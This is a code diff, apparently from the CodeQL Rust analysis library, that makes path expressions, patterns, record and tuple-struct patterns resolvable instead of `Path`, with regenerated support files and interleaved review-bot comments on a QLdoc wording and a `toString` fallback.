@@ -1046,9 +1053,11 @@ test/extractor-tests/generated/TupleFieldList/TupleFieldList.ql 7dc88440222ff036 test/extractor-tests/generated/TupleFieldList/TupleFieldList_getField.ql ad552a9c0b9964d1770f14cabbb436db60ebedc3c569006542a8eae9ddb30f6d 3a8c49d629376a9b8326138836b05ee2366b1021ffd19f5be74ab023e70aa50d test/extractor-tests/generated/TuplePat/TuplePat.ql 24ee56bc848537da65eb8ecef71e84cc351a2aedcc31d6fb53a5b7865f15f7c2 81db1076e2e4921ceb50933b96cd7b574caab1818de257c1e9038f3f97447d59 test/extractor-tests/generated/TuplePat/TuplePat_getField.ql f000bed41af031bc56d0705ce312abe7ab3dc6745b2936798c9938781e51475e f464a84dbc36aa371d60d6db68d6251f6b275dc4ecebdc56f195637be390b067 -test/extractor-tests/generated/TupleStructPat/TupleStructPat.ql 6e6cfba0d2565782088af55ca977ada3d8093200aa180a49a67c9a176c52c254 c10c93823a9d814d694ca88fdf65a9bf8c1bb178e50c08982a97aa8d445284b3 +test/extractor-tests/generated/TupleStructPat/TupleStructPat.ql 194b2fbfc83a84caf76032f3c63a1f7e618f71e5ea5be449e9d2691b0fce9829 0ff24488ba5729591ce86a702fdfb6f4e0498f96d89bf5c4bd05bd90523f9435 test/extractor-tests/generated/TupleStructPat/TupleStructPat_getField.ql f3f2e23cc2a32aa5abc1e0fda1300dab1693230632b9eaa75bb3b1e82ee9ea1a 24b87a39ec639a26ff8c1d04dc3429b72266b2a3b1650a06a7cd4387b6f0e615 test/extractor-tests/generated/TupleStructPat/TupleStructPat_getPath.ql 13a06696bbf1fa8d5b73107e28cdba40e93da04b27f9c54381b78a52368d2ad1 5558c35ea9bb371ad90a5b374d7530dd1936f83e6ba656ebfbfd5bd63598e088 +test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedCrateOrigin.ql e409667233331a038e482de4b2669d9fac9d7eb0e3bd5580ea19828f0c4ed7ad 588e4628471f1004575900d7365490efcf9168b555ff26becfc3f27b9e657de3 +test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedPath.ql 150898b6e55cc74b9ddb947f136b5a7f538ee5598928c5724d80e3ddf93ae499 66e0bd7b32df8f5bbe229cc02be6a07cb9ec0fe8b444dad3f5b32282a90551ee test/extractor-tests/generated/TupleType/TupleType.ql 
e5951a30817b8c51fe9cb9435f75bfdca2a1277b2094267d3205e33ef1ee9a9c 9a4d57322ed2cff57057654272981b056f833136f983141b033afaf64e19c117 test/extractor-tests/generated/TupleType/TupleType_getField.ql b73a8cdaf6ba46cf9b63d8819239d2d2c06b3496ed4768e8a387a7558178fbd8 6efbcf13c25d0ff3ed0c6d194ba44d2abfa620406badef8184953395fab92bb4 test/extractor-tests/generated/TypeAlias/TypeAlias.ql 87645d4aa0e2c789dfd7111c6150e72c65b2e108b371bb5fc247aa8d34a25893 6335b4e56d998eed57d8f026d2d1dbfc018754e87c755e1194a2ef9f7a468233 diff --git a/rust/ql/.gitattributes b/rust/ql/.gitattributes index c75ea349c0d..973f32e7d9b 100644 --- a/rust/ql/.gitattributes +++ b/rust/ql/.gitattributes @@ -372,7 +372,6 @@ /lib/codeql/rust/elements/internal/TuplePatConstructor.qll linguist-generated /lib/codeql/rust/elements/internal/TuplePatImpl.qll linguist-generated /lib/codeql/rust/elements/internal/TupleStructPatConstructor.qll linguist-generated -/lib/codeql/rust/elements/internal/TupleStructPatImpl.qll linguist-generated /lib/codeql/rust/elements/internal/TupleTypeConstructor.qll linguist-generated /lib/codeql/rust/elements/internal/TupleTypeImpl.qll linguist-generated /lib/codeql/rust/elements/internal/TypeAliasConstructor.qll linguist-generated @@ -729,6 +728,8 @@ /test/extractor-tests/generated/FormatArgsExpr/FormatArgument.ql linguist-generated /test/extractor-tests/generated/FormatArgsExpr/FormatArgument_getVariable.ql linguist-generated /test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess.ql linguist-generated +/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedCrateOrigin.ql linguist-generated +/test/extractor-tests/generated/FormatArgsExpr/FormatTemplateVariableAccess_getResolvedPath.ql linguist-generated /test/extractor-tests/generated/FormatArgsExpr/Format_getArgument.ql linguist-generated /test/extractor-tests/generated/Function/Function.ql linguist-generated /test/extractor-tests/generated/Function/Function_getAbi.ql linguist-generated 
@@ -901,8 +902,12 @@ /test/extractor-tests/generated/Path/PathExpr.ql linguist-generated /test/extractor-tests/generated/Path/PathExpr_getAttr.ql linguist-generated /test/extractor-tests/generated/Path/PathExpr_getPath.ql linguist-generated +/test/extractor-tests/generated/Path/PathExpr_getResolvedCrateOrigin.ql linguist-generated +/test/extractor-tests/generated/Path/PathExpr_getResolvedPath.ql linguist-generated /test/extractor-tests/generated/Path/PathPat.ql linguist-generated /test/extractor-tests/generated/Path/PathPat_getPath.ql linguist-generated +/test/extractor-tests/generated/Path/PathPat_getResolvedCrateOrigin.ql linguist-generated +/test/extractor-tests/generated/Path/PathPat_getResolvedPath.ql linguist-generated /test/extractor-tests/generated/Path/PathSegment.ql linguist-generated /test/extractor-tests/generated/Path/PathSegment_getGenericArgList.ql linguist-generated /test/extractor-tests/generated/Path/PathSegment_getNameRef.ql linguist-generated @@ -915,8 +920,6 @@ /test/extractor-tests/generated/Path/PathType_getPath.ql linguist-generated /test/extractor-tests/generated/Path/Path_getPart.ql linguist-generated /test/extractor-tests/generated/Path/Path_getQualifier.ql linguist-generated -/test/extractor-tests/generated/Path/Path_getResolvedCrateOrigin.ql linguist-generated -/test/extractor-tests/generated/Path/Path_getResolvedPath.ql linguist-generated /test/extractor-tests/generated/PrefixExpr/PrefixExpr.ql linguist-generated /test/extractor-tests/generated/PrefixExpr/PrefixExpr_getAttr.ql linguist-generated /test/extractor-tests/generated/PrefixExpr/PrefixExpr_getExpr.ql linguist-generated 
@@ -935,6 +938,8 @@ /test/extractor-tests/generated/RecordExpr/RecordExpr.ql linguist-generated /test/extractor-tests/generated/RecordExpr/RecordExpr_getPath.ql linguist-generated /test/extractor-tests/generated/RecordExpr/RecordExpr_getRecordExprFieldList.ql linguist-generated +/test/extractor-tests/generated/RecordExpr/RecordExpr_getResolvedCrateOrigin.ql linguist-generated +/test/extractor-tests/generated/RecordExpr/RecordExpr_getResolvedPath.ql linguist-generated /test/extractor-tests/generated/RecordExprField/RecordExprField.ql linguist-generated /test/extractor-tests/generated/RecordExprField/RecordExprField_getAttr.ql linguist-generated /test/extractor-tests/generated/RecordExprField/RecordExprField_getExpr.ql linguist-generated @@ -953,6 +958,8 @@ /test/extractor-tests/generated/RecordPat/RecordPat.ql linguist-generated /test/extractor-tests/generated/RecordPat/RecordPat_getPath.ql linguist-generated /test/extractor-tests/generated/RecordPat/RecordPat_getRecordPatFieldList.ql linguist-generated +/test/extractor-tests/generated/RecordPat/RecordPat_getResolvedCrateOrigin.ql linguist-generated +/test/extractor-tests/generated/RecordPat/RecordPat_getResolvedPath.ql linguist-generated /test/extractor-tests/generated/RecordPatField/RecordPatField.ql linguist-generated /test/extractor-tests/generated/RecordPatField/RecordPatField_getAttr.ql linguist-generated /test/extractor-tests/generated/RecordPatField/RecordPatField_getNameRef.ql linguist-generated 
@@ -1051,6 +1058,8 @@ /test/extractor-tests/generated/TupleStructPat/TupleStructPat.ql linguist-generated /test/extractor-tests/generated/TupleStructPat/TupleStructPat_getField.ql linguist-generated /test/extractor-tests/generated/TupleStructPat/TupleStructPat_getPath.ql linguist-generated +/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedCrateOrigin.ql linguist-generated +/test/extractor-tests/generated/TupleStructPat/TupleStructPat_getResolvedPath.ql linguist-generated /test/extractor-tests/generated/TupleType/TupleType.ql linguist-generated /test/extractor-tests/generated/TupleType/TupleType_getField.ql linguist-generated /test/extractor-tests/generated/TypeAlias/TypeAlias.ql linguist-generated diff --git a/rust/ql/lib/codeql/rust/elements/Path.qll b/rust/ql/lib/codeql/rust/elements/Path.qll index cb228373cf5..a3549e66a85 100644 --- a/rust/ql/lib/codeql/rust/elements/Path.qll +++ b/rust/ql/lib/codeql/rust/elements/Path.qll @@ -4,8 +4,8 @@ */ private import internal.PathImpl +import codeql.rust.elements.AstNode import codeql.rust.elements.PathSegment -import codeql.rust.elements.Resolvable /** * A path. For example: diff --git a/rust/ql/lib/codeql/rust/elements/PathExprBase.qll b/rust/ql/lib/codeql/rust/elements/PathExprBase.qll index e2e45e718f0..95fd48d6386 100644 --- a/rust/ql/lib/codeql/rust/elements/PathExprBase.qll +++ b/rust/ql/lib/codeql/rust/elements/PathExprBase.qll @@ -5,6 +5,7 @@ private import internal.PathExprBaseImpl import codeql.rust.elements.Expr +import codeql.rust.elements.Resolvable /** * A path expression or a variable access in a formatting template. See `PathExpr` and `FormatTemplateVariableAccess` for further details. diff --git a/rust/ql/lib/codeql/rust/elements/PathPat.qll b/rust/ql/lib/codeql/rust/elements/PathPat.qll index 17dc5f71381..2c360a2b858 100644 --- a/rust/ql/lib/codeql/rust/elements/PathPat.qll +++ b/rust/ql/lib/codeql/rust/elements/PathPat.qll 
@@ -6,6 +6,7 @@ private import internal.PathPatImpl import codeql.rust.elements.Pat import codeql.rust.elements.Path +import codeql.rust.elements.Resolvable /** * A path pattern. For example: diff --git a/rust/ql/lib/codeql/rust/elements/RecordExpr.qll b/rust/ql/lib/codeql/rust/elements/RecordExpr.qll index 90edf3d0c03..c993059e977 100644 --- a/rust/ql/lib/codeql/rust/elements/RecordExpr.qll +++ b/rust/ql/lib/codeql/rust/elements/RecordExpr.qll @@ -7,6 +7,7 @@ private import internal.RecordExprImpl import codeql.rust.elements.Expr import codeql.rust.elements.Path import codeql.rust.elements.RecordExprFieldList +import codeql.rust.elements.Resolvable /** * A record expression. For example: diff --git a/rust/ql/lib/codeql/rust/elements/RecordPat.qll b/rust/ql/lib/codeql/rust/elements/RecordPat.qll index 671bafda1c3..fb37a42659b 100644 --- a/rust/ql/lib/codeql/rust/elements/RecordPat.qll +++ b/rust/ql/lib/codeql/rust/elements/RecordPat.qll @@ -7,6 +7,7 @@ private import internal.RecordPatImpl import codeql.rust.elements.Pat import codeql.rust.elements.Path import codeql.rust.elements.RecordPatFieldList +import codeql.rust.elements.Resolvable /** * A record pattern. For example: diff --git a/rust/ql/lib/codeql/rust/elements/Resolvable.qll b/rust/ql/lib/codeql/rust/elements/Resolvable.qll index e3e7b772501..200809dd852 100644 --- a/rust/ql/lib/codeql/rust/elements/Resolvable.qll +++ b/rust/ql/lib/codeql/rust/elements/Resolvable.qll @@ -7,6 +7,6 @@ private import internal.ResolvableImpl import codeql.rust.elements.AstNode /** - * Either a `Path`, or a `MethodCallExpr`. + * Either a `PathExpr`, a `PathPat`, or a `MethodCallExpr`. */ final class Resolvable = Impl::Resolvable; diff --git a/rust/ql/lib/codeql/rust/elements/TupleStructPat.qll b/rust/ql/lib/codeql/rust/elements/TupleStructPat.qll index c43672509f7..5470d18d35a 100644 --- a/rust/ql/lib/codeql/rust/elements/TupleStructPat.qll +++ b/rust/ql/lib/codeql/rust/elements/TupleStructPat.qll 
@@ -6,6 +6,7 @@ private import internal.TupleStructPatImpl import codeql.rust.elements.Pat import codeql.rust.elements.Path +import codeql.rust.elements.Resolvable /** * A tuple struct pattern. For example: diff --git a/rust/ql/lib/codeql/rust/elements/internal/CallExprBaseImpl.qll b/rust/ql/lib/codeql/rust/elements/internal/CallExprBaseImpl.qll index d0e4049a05d..e65f02afdb7 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/CallExprBaseImpl.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/CallExprBaseImpl.qll @@ -5,6 +5,7 @@ */ private import codeql.rust.elements.internal.generated.CallExprBase +private import codeql.rust.elements.Resolvable /** * INTERNAL: This module contains the customizable definition of `CallExprBase` and should not @@ -20,7 +21,7 @@ module Impl { private Resolvable getCallResolvable(CallExprBase call) { result = call.(MethodCallExpr) or - result = call.(CallExpr).getFunction().(PathExpr).getPath() + result = call.(CallExpr).getFunction().(PathExpr) } // the following QLdoc is generated: if you need to edit it, do it in the schema file diff --git a/rust/ql/lib/codeql/rust/elements/internal/ResolvableImpl.qll b/rust/ql/lib/codeql/rust/elements/internal/ResolvableImpl.qll index fafb86d46c0..eacd777c7e2 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/ResolvableImpl.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/ResolvableImpl.qll @@ -15,7 +15,7 @@ module Impl { // the following QLdoc is generated: if you need to edit it, do it in the schema file /** - * Either a `Path`, or a `MethodCallExpr`. + * Either a `PathExpr`, a `PathPat`, or a `MethodCallExpr`. */ class Resolvable extends Generated::Resolvable { /** diff --git a/rust/ql/lib/codeql/rust/elements/internal/TupleStructPatImpl.qll b/rust/ql/lib/codeql/rust/elements/internal/TupleStructPatImpl.qll index 1f92ed5a190..29ec980c2eb 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/TupleStructPatImpl.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/TupleStructPatImpl.qll 
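Review bot: The new QLdoc on `Resolvable` in `ResolvableImpl.qll` ("Either a `PathExpr`, a `PathPat`, or a `MethodCallExpr`") lists fewer types than this commit makes resolvable. The same patch imports `Resolvable` into `RecordExpr.qll`, `RecordPat.qll` and `TupleStructPat.qll`, and the generated `PathExprBase` (which, per its own QLdoc, also covers `FormatTemplateVariableAccess`) now extends `ResolvableImpl::Resolvable`. The comment is marked as generated, so the correction belongs in the schema file; suggested wording: "One of `PathExprBase`, `PathPat`, `RecordExpr`, `RecordPat`, `TupleStructPat` or `MethodCallExpr`." The identical sentence in `Resolvable.qll` should pick up the change on regeneration.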
@@ -1,4 +1,3 @@ -// generated by codegen, remove this comment if you wish to edit this file /** * This module provides a hand-modifiable wrapper around the generated class `TupleStructPat`. * @@ -12,6 +11,7 @@ private import codeql.rust.elements.internal.generated.TupleStructPat * be referenced directly. */ module Impl { + // the following QLdoc is generated: if you need to edit it, do it in the schema file /** * A tuple struct pattern. For example: * ```rust @@ -22,5 +22,7 @@ module Impl { * }; * ``` */ - class TupleStructPat extends Generated::TupleStructPat { } + class TupleStructPat extends Generated::TupleStructPat { + override string toString() { result = this.getPath().toAbbreviatedString() + "(...)" } + } } diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/ParentChild.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/ParentChild.qll index 6709629e8b4..aabbb0668d8 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/ParentChild.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/ParentChild.qll @@ -670,6 +670,25 @@ private module Impl { ) } + private Element getImmediateChildOfPath(Path e, int index, string partialPredicateCall) { + exists(int b, int bAstNode, int n, int nQualifier, int nPart | + b = 0 and + bAstNode = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfAstNode(e, i, _)) | i) and + n = bAstNode and + nQualifier = n + 1 and + nPart = nQualifier + 1 and + ( + none() + or + result = getImmediateChildOfAstNode(e, index - b, partialPredicateCall) + or + index = n and result = e.getQualifier() and partialPredicateCall = "Qualifier()" + or + index = nQualifier and result = e.getPart() and partialPredicateCall = "Part()" + ) + ) + } + private Element getImmediateChildOfPathSegment( PathSegment e, int index, string partialPredicateCall ) { 
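Review bot: The new `toString()` override in `TupleStructPatImpl.qll` has no result when `this.getPath()` has none, so such a pattern would lose its string representation. The separate `TupleStructPat_getPath.ql` test suggests the path is an optional child, which would make this reachable, presumably for incomplete or unparsable code; please confirm against the schema. Rows that print such an element may then go missing from query output or trip consistency checks. A fallback keeps every element printable: `override string toString() { result = this.getPath().toAbbreviatedString() + "(...)" or not exists(this.getPath()) and result = "(...)" }`. If `toAbbreviatedString()` can itself lack a result, the guard should cover that case as well.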
@@ -2166,52 +2185,40 @@ private module Impl { ) } - private Element getImmediateChildOfPath(Path e, int index, string partialPredicateCall) { - exists(int b, int bResolvable, int n, int nQualifier, int nPart | - b = 0 and - bResolvable = - b + 1 + max(int i | i = -1 or exists(getImmediateChildOfResolvable(e, i, _)) | i) and - n = bResolvable and - nQualifier = n + 1 and - nPart = nQualifier + 1 and - ( - none() - or - result = getImmediateChildOfResolvable(e, index - b, partialPredicateCall) - or - index = n and result = e.getQualifier() and partialPredicateCall = "Qualifier()" - or - index = nQualifier and result = e.getPart() and partialPredicateCall = "Part()" - ) - ) - } - private Element getImmediateChildOfPathExprBase( PathExprBase e, int index, string partialPredicateCall ) { - exists(int b, int bExpr, int n | + exists(int b, int bExpr, int bResolvable, int n | b = 0 and bExpr = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfExpr(e, i, _)) | i) and - n = bExpr and + bResolvable = + bExpr + 1 + max(int i | i = -1 or exists(getImmediateChildOfResolvable(e, i, _)) | i) and + n = bResolvable and ( none() or result = getImmediateChildOfExpr(e, index - b, partialPredicateCall) + or + result = getImmediateChildOfResolvable(e, index - bExpr, partialPredicateCall) ) ) } private Element getImmediateChildOfPathPat(PathPat e, int index, string partialPredicateCall) { - exists(int b, int bPat, int n, int nPath | + exists(int b, int bPat, int bResolvable, int n, int nPath | b = 0 and bPat = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfPat(e, i, _)) | i) and - n = bPat and + bResolvable = + bPat + 1 + max(int i | i = -1 or exists(getImmediateChildOfResolvable(e, i, _)) | i) and + n = bResolvable and nPath = n + 1 and ( none() or result = getImmediateChildOfPat(e, index - b, partialPredicateCall) or + result = getImmediateChildOfResolvable(e, index - bPat, partialPredicateCall) + or index = n and result = e.getPath() and partialPredicateCall = "Path()" ) 
) @@ -2312,10 +2319,12 @@ private module Impl { } private Element getImmediateChildOfRecordExpr(RecordExpr e, int index, string partialPredicateCall) { - exists(int b, int bExpr, int n, int nPath, int nRecordExprFieldList | + exists(int b, int bExpr, int bResolvable, int n, int nPath, int nRecordExprFieldList | b = 0 and bExpr = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfExpr(e, i, _)) | i) and - n = bExpr and + bResolvable = + bExpr + 1 + max(int i | i = -1 or exists(getImmediateChildOfResolvable(e, i, _)) | i) and + n = bResolvable and nPath = n + 1 and nRecordExprFieldList = nPath + 1 and ( @@ -2323,6 +2332,8 @@ private module Impl { or result = getImmediateChildOfExpr(e, index - b, partialPredicateCall) or + result = getImmediateChildOfResolvable(e, index - bExpr, partialPredicateCall) + or index = n and result = e.getPath() and partialPredicateCall = "Path()" or index = nPath and @@ -2352,10 +2363,12 @@ private module Impl { } private Element getImmediateChildOfRecordPat(RecordPat e, int index, string partialPredicateCall) { - exists(int b, int bPat, int n, int nPath, int nRecordPatFieldList | + exists(int b, int bPat, int bResolvable, int n, int nPath, int nRecordPatFieldList | b = 0 and bPat = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfPat(e, i, _)) | i) and - n = bPat and + bResolvable = + bPat + 1 + max(int i | i = -1 or exists(getImmediateChildOfResolvable(e, i, _)) | i) and + n = bResolvable and nPath = n + 1 and nRecordPatFieldList = nPath + 1 and ( @@ -2363,6 +2376,8 @@ private module Impl { or result = getImmediateChildOfPat(e, index - b, partialPredicateCall) or + result = getImmediateChildOfResolvable(e, index - bPat, partialPredicateCall) + or index = n and result = e.getPath() and partialPredicateCall = "Path()" or index = nPath and 
@@ -2596,10 +2611,12 @@ private module Impl { private Element getImmediateChildOfTupleStructPat( TupleStructPat e, int index, string partialPredicateCall ) { - exists(int b, int bPat, int n, int nField, int nPath | + exists(int b, int bPat, int bResolvable, int n, int nField, int nPath | b = 0 and bPat = b + 1 + max(int i | i = -1 or exists(getImmediateChildOfPat(e, i, _)) | i) and - n = bPat and + bResolvable = + bPat + 1 + max(int i | i = -1 or exists(getImmediateChildOfResolvable(e, i, _)) | i) and + n = bResolvable and nField = n + 1 + max(int i | i = -1 or exists(e.getField(i)) | i) and nPath = nField + 1 and ( @@ -2607,6 +2624,8 @@ private module Impl { or result = getImmediateChildOfPat(e, index - b, partialPredicateCall) or + result = getImmediateChildOfResolvable(e, index - bPat, partialPredicateCall) + or result = e.getField(index - n) and partialPredicateCall = "Field(" + (index - n).toString() + ")" or @@ -3652,6 +3671,8 @@ private module Impl { or result = getImmediateChildOfParamList(e, index, partialAccessor) or + result = getImmediateChildOfPath(e, index, partialAccessor) + or result = getImmediateChildOfPathSegment(e, index, partialAccessor) or result = getImmediateChildOfRecordExprField(e, index, partialAccessor) @@ -3782,8 +3803,6 @@ private module Impl { or result = getImmediateChildOfParenType(e, index, partialAccessor) or - result = getImmediateChildOfPath(e, index, partialAccessor) - or result = getImmediateChildOfPathPat(e, index, partialAccessor) or result = getImmediateChildOfPathType(e, index, partialAccessor) diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/Path.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/Path.qll index 36313ca9fe9..b9a6edce9f4 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/Path.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/Path.qll 
@@ -6,9 +6,9 @@ private import codeql.rust.elements.internal.generated.Synth private import codeql.rust.elements.internal.generated.Raw +import codeql.rust.elements.internal.AstNodeImpl::Impl as AstNodeImpl import codeql.rust.elements.Path import codeql.rust.elements.PathSegment -import codeql.rust.elements.internal.ResolvableImpl::Impl as ResolvableImpl /** * INTERNAL: This module contains the fully generated definition of `Path` and should not @@ -24,7 +24,7 @@ module Generated { * INTERNAL: Do not reference the `Generated::Path` class directly. * Use the subclass `Path`, where the following predicates are available. */ - class Path extends Synth::TPath, ResolvableImpl::Resolvable { + class Path extends Synth::TPath, AstNodeImpl::AstNode { override string getAPrimaryQlClass() { result = "Path" } /** diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/PathExprBase.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/PathExprBase.qll index cf924962dbe..2efc1fd3dae 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/PathExprBase.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/PathExprBase.qll @@ -7,6 +7,7 @@ private import codeql.rust.elements.internal.generated.Synth private import codeql.rust.elements.internal.generated.Raw import codeql.rust.elements.internal.ExprImpl::Impl as ExprImpl +import codeql.rust.elements.internal.ResolvableImpl::Impl as ResolvableImpl /** * INTERNAL: This module contains the fully generated definition of `PathExprBase` and should not @@ -18,5 +19,5 @@ module Generated { * INTERNAL: Do not reference the `Generated::PathExprBase` class directly. * Use the subclass `PathExprBase`, where the following predicates are available. */ - class PathExprBase extends Synth::TPathExprBase, ExprImpl::Expr { } + class PathExprBase extends Synth::TPathExprBase, ExprImpl::Expr, ResolvableImpl::Resolvable { } } 
diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/PathPat.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/PathPat.qll index f91949de40e..e37e1e154db 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/PathPat.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/PathPat.qll @@ -8,6 +8,7 @@ private import codeql.rust.elements.internal.generated.Synth private import codeql.rust.elements.internal.generated.Raw import codeql.rust.elements.internal.PatImpl::Impl as PatImpl import codeql.rust.elements.Path +import codeql.rust.elements.internal.ResolvableImpl::Impl as ResolvableImpl /** * INTERNAL: This module contains the fully generated definition of `PathPat` and should not @@ -25,7 +26,7 @@ module Generated { * INTERNAL: Do not reference the `Generated::PathPat` class directly. * Use the subclass `PathPat`, where the following predicates are available. */ - class PathPat extends Synth::TPathPat, PatImpl::Pat { + class PathPat extends Synth::TPathPat, PatImpl::Pat, ResolvableImpl::Resolvable { override string getAPrimaryQlClass() { result = "PathPat" } /** diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/Raw.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/Raw.qll index 1c85daa22cf..368be81ad06 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/Raw.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/Raw.qll 
@@ -590,6 +590,28 @@ module Raw { */ class Pat extends @pat, AstNode { } + /** + * INTERNAL: Do not use. + * A path. For example: + * ```rust + * use some_crate::some_module::some_item; + * foo::bar; + * ``` + */ + class Path extends @path, AstNode { + override string toString() { result = "Path" } + + /** + * Gets the qualifier of this path, if it exists. + */ + Path getQualifier() { path_qualifiers(this, result) } + + /** + * Gets the part of this path, if it exists. + */ + PathSegment getPart() { path_parts(this, result) } + } + /** * INTERNAL: Do not use. * A path segment, which is one part of a whole path. @@ -781,7 +803,7 @@ module Raw { /** * INTERNAL: Do not use. - * Either a `Path`, or a `MethodCallExpr`. + * Either a `PathExpr`, a `PathPat`, or a `MethodCallExpr`. */ class Resolvable extends @resolvable, AstNode { /** @@ -2278,33 +2300,11 @@ module Raw { TypeRef getTy() { paren_type_ties(this, result) } } - /** - * INTERNAL: Do not use. - * A path. For example: - * ```rust - * use some_crate::some_module::some_item; - * foo::bar; - * ``` - */ - class Path extends @path, Resolvable { - override string toString() { result = "Path" } - - /** - * Gets the qualifier of this path, if it exists. - */ - Path getQualifier() { path_qualifiers(this, result) } - - /** - * Gets the part of this path, if it exists. - */ - PathSegment getPart() { path_parts(this, result) } - } - /** * INTERNAL: Do not use. * A path expression or a variable access in a formatting template. See `PathExpr` and `FormatTemplateVariableAccess` for further details. */ - class PathExprBase extends @path_expr_base, Expr { } + class PathExprBase extends @path_expr_base, Expr, Resolvable { } /** * INTERNAL: Do not use. @@ -2316,7 +2316,7 @@ module Raw { * } * ``` */ - class PathPat extends @path_pat, Pat { + class PathPat extends @path_pat, Pat, Resolvable { override string toString() { result = "PathPat" } /** 
@@ -2472,7 +2472,7 @@ module Raw { * Foo { .. } = second; * ``` */ - class RecordExpr extends @record_expr, Expr { + class RecordExpr extends @record_expr, Expr, Resolvable { override string toString() { result = "RecordExpr" } /** @@ -2514,7 +2514,7 @@ module Raw { * } * ``` */ - class RecordPat extends @record_pat, Pat { + class RecordPat extends @record_pat, Pat, Resolvable { override string toString() { result = "RecordPat" } /** @@ -2812,7 +2812,7 @@ module Raw { * }; * ``` */ - class TupleStructPat extends @tuple_struct_pat, Pat { + class TupleStructPat extends @tuple_struct_pat, Pat, Resolvable { override string toString() { result = "TupleStructPat" } /** diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/RecordExpr.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/RecordExpr.qll index 96fc2aa61d0..d7c6a11f21a 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/RecordExpr.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/RecordExpr.qll @@ -9,6 +9,7 @@ private import codeql.rust.elements.internal.generated.Raw import codeql.rust.elements.internal.ExprImpl::Impl as ExprImpl import codeql.rust.elements.Path import codeql.rust.elements.RecordExprFieldList +import codeql.rust.elements.internal.ResolvableImpl::Impl as ResolvableImpl /** * INTERNAL: This module contains the fully generated definition of `RecordExpr` and should not @@ -26,7 +27,7 @@ module Generated { * INTERNAL: Do not reference the `Generated::RecordExpr` class directly. * Use the subclass `RecordExpr`, where the following predicates are available. */ - class RecordExpr extends Synth::TRecordExpr, ExprImpl::Expr { + class RecordExpr extends Synth::TRecordExpr, ExprImpl::Expr, ResolvableImpl::Resolvable { override string getAPrimaryQlClass() { result = "RecordExpr" } /** 
diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/RecordPat.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/RecordPat.qll index b4aa66a71a0..03f2c525180 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/RecordPat.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/RecordPat.qll @@ -9,6 +9,7 @@ private import codeql.rust.elements.internal.generated.Raw import codeql.rust.elements.internal.PatImpl::Impl as PatImpl import codeql.rust.elements.Path import codeql.rust.elements.RecordPatFieldList +import codeql.rust.elements.internal.ResolvableImpl::Impl as ResolvableImpl /** * INTERNAL: This module contains the fully generated definition of `RecordPat` and should not @@ -26,7 +27,7 @@ module Generated { * INTERNAL: Do not reference the `Generated::RecordPat` class directly. * Use the subclass `RecordPat`, where the following predicates are available. */ - class RecordPat extends Synth::TRecordPat, PatImpl::Pat { + class RecordPat extends Synth::TRecordPat, PatImpl::Pat, ResolvableImpl::Resolvable { override string getAPrimaryQlClass() { result = "RecordPat" } /** diff --git a/rust/ql/lib/codeql/rust/elements/internal/generated/Resolvable.qll b/rust/ql/lib/codeql/rust/elements/internal/generated/Resolvable.qll index 018c451e584..ecd1e7db50a 100644 --- a/rust/ql/lib/codeql/rust/elements/internal/generated/Resolvable.qll +++ b/rust/ql/lib/codeql/rust/elements/internal/generated/Resolvable.qll @@ -14,7 +14,7 @@ import codeql.rust.elements.internal.AstNodeImpl::Impl as AstNodeImpl */ module Generated { /** - * Either a `Path`, or a `MethodCallExpr`. + * Either a `PathExpr`, a `PathPat`, or a `MethodCallExpr`. * INTERNAL: Do not reference the `Generated::Resolvable` class directly. * Use the subclass `Resolvable`, where the following predicates are available. */ 
